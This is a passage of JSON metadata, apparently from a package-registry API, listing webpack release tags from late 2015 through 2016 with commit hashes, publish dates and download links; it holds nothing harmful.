job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/t